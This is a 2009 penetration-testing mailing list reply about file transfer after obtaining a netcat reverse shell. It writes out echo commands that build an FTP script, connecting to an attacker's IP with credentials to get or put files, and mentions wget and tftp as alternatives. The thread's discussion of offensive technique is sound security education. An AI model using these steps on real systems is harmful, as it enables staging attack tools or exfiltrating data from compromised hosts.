Penetration Testing mailing list archives
RE: Netcat reverse shell and ftp
From: "Glafkos Charalambous" <glafkos () infosec org uk>
Date: Mon, 26 Jan 2009 15:15:13 +0200
Hello, The answer is that it can be done in many ways and everything depends on the attackers imagination. He can use netcat to create a reverse shell connection but from there he is not limited at all to use ftp transfer for the files or any other possible way to accomplish his task. Is there a specific reason you are asking only for ftp transfer? If yes let assume the following: The attacker can direct connect to his attacking machine and transfer files through netcat listening on his ftp instead of opening a command prompt. Secondly he can do the transfer with netcat itself He can even use echo from command prompt to create his ftp transfer file because as u might know ftp through netcat command prompt is non interactive. There are plenty of ways to do so.. Example of ftp transfer file: echo open ipaddress > ftp.txt echo username >> ftp.txt echo password >> ftp.txt echo bin >> ftp.txt echo (m)get/(m)put file >> ftp.txt echo bye >> ftp.txt Execute: ftp -s:ftp.txt There are plenty of tools that might be used to transfer files and not limited to (ftp, wget, tftp). Everything depends on the system and how hardened and secured it is. There are many IT Solutions available at www.itsolutionskb.com if you are interested to have a look. It's 3 months old but growing everyday larger.. Kindly Regards Charalambous Glafkos ( nowayout ) __________________________________________ ASTALAVISTA - the hacking & security community www.astalavista.com www.astalavista.net __________ Information from ESET Smart Security, version of virus signature database 3800 (20090126) __________ The message was checked by ESET Smart Security. http://www.eset.com
Current thread:
- Netcat reverse shell and ftp Avaya.Toons (Jan 25)
- Re: Netcat reverse shell and ftp Craig Wright (Jan 26)
- Re: Netcat reverse shell and ftp Giuseppe Fuggiano (Jan 26)
- Re: Netcat reverse shell and ftp Adriel T. Desautels (Jan 26)
- Re: Netcat reverse shell and ftp César García (Jan 26)
- Re: Netcat reverse shell and ftp David Howe (Jan 26)
- Re: Netcat reverse shell and ftp Avaya.Toons (Jan 27)
- RE: Netcat reverse shell and ftp Glafkos Charalambous (Jan 27)
- Re: Netcat reverse shell and ftp Avaya.Toons (Jan 28)
- Message not available
- Re: Netcat reverse shell and ftp David Howe (Jan 27)
- Re: Netcat reverse shell and ftp Avaya.Toons (Jan 27)
- Re: Netcat reverse shell and ftp René Østensen (Jan 28)
- RE: Netcat reverse shell and ftp Glafkos Charalambous (Jan 28)
- <Possible follow-ups>
- Re: Netcat reverse shell and ftp anastasiosm (Jan 26)